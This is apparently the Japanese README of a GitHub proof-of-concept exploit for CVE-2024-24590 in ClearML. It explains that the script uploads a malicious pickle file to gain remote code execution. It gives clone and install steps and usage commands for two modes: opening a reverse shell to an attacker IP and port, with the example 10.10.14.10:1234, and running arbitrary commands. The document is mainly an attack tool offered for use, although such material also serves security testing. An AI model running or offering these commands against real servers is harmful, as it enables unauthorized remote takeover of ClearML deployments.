
CVE-2024-24590 ClearML RCE&CMD POC
このリポジトリには、CVE-2024-24590 用の Python エクスプロイトスクリプトが含まれています。このスクリプトは、ClearML に悪意のある pickle ファイルをアップロードし、リバースシェルまたはカスタムコマンドを実行するように設計されています。
リポジトリをクローンします:
git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
cd CVE-2024-24590-ClearML-RCE-CMD-POC
ClearML SDK をインストールします:
pip install clearml
clearml-init
このスクリプトは、default と cmd の 2 つの動作モードをサポートしています。
このモードでは、リバースシェルを確立するために攻撃者の IP アドレスとポートを指定する必要があります。
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>
このモードでは、実行するカスタムコマンドを指定できます。
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"